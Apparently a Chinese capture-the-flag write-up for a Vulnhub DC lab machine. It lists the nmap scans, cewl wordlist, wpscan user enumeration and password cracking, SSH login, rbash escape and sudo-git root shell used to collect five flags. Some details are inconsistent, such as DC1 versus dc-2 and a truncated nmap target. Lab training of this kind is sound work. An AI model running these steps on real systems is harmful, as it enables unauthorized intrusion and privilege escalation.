配置信息:
靶机下载地址:Vulnhub-DC
靶机:DC1 (VirtualBox)  IP:192.168.67.52
攻机:Kali (Local)      IP:192.168.67.109
目标:获取5个flag
开始游戏:

nmap获取目标IP地址为:192.168.67.52
nmap -sn 192.168.67.0/24

nmap扫描目标信息,发现开放了:SSH服务[7744] && HTTP服务[80]
nmap -A -p- 192.168.67

果断登录该网站http://192.168.67.52,发现页面重定向到http://dc-2,浏览这个网页,发现了flag1

获取信息:maybe you just need to be cewl.

依据此信息,利用 cewl 抓取该站点生成破解密码的字典:
cewl http://dc-2 -w dc2.txt

随后回到网页上,发现flag的url地址为:http://dc-2/index.php/flag,想着把 flag 改改会不会出现什么东西呢?哦吼,发现了一个搜搜框框,果断搜索一下还有木有flag,还真发现了 flag2



确实搜索到了 flag2,但这个 flag2 貌似不能呢个带来什么新思路,于是暂停思考下目前为止我们得到了什么,得到了一个字典,那这个字典应该要想办法让他上场,但是破解需要用户名和密码,现在我们有密码了,但是没有用户名,怎么办呢?突然,眼前一亮,没错,就决定是你了,神奇宝贝!—— wpscan
wpscan --url http://dc-2 -e u


得到了三个用户名:admin,jerry and tom.
紧接着利用 wpscan 尝试破解密码:


admin的密码没得到,只得到了jerry和tom的,将密码保存下来,记为pwdd.txt,于是乎拿去登录,(wordpress默认的登录页面为wp-login.php),但是没有得到什么,正当穷途末路之时,做的记录看到有个7744的ssh,这是多么强烈的暗示啊。果断ssh登录,期间想用jerry登录ssh但卡壳了,一直登录不上,换tom,登录成功~
ssh -p 7744 jerry@192.168.67.52
ssh -p 7744 tom@192.168.67.52

ls查看以下,发现 flag3

果断想 cat 查看一番,结果来了这么一出:
-rbash:cat command not found
cat不行,我又分别试了more,vim,vi,vi成功打开

获取信息:jerry的权限在于tom之上

这是需要转变为jerry的身份
su jerry
-rbash:su command not found
果断提权,然后 su 到 jerry,直觉告诉我 flag4 就在 /home/jeryy 目录下:
BASH_CMDS[a]="/bin/sh";a
export PATH=$PATH:/usr/sbin:/usr/bin:/sbin:/bin
su jerry
cd /home/jerry
ls
cat flag4.txt

flag4 到手


获取信息:git outta here!!!!

这是让我们用 git 提权么?上惹人爱的 gtfobins 查看以下 git 提权的用法:

回到命令行,输入提权命令,发现还是jerry身份,于是加 sudo 试一下,查看flag5完成目标:

git help config
!/bin/sh
sudo git helo config
!/bin/sh



游戏结束

总结:
0:cewl 抓取网页可用密码
1:wpscan 扫描与密码破解
2:Linux 提权
3:敢于尝试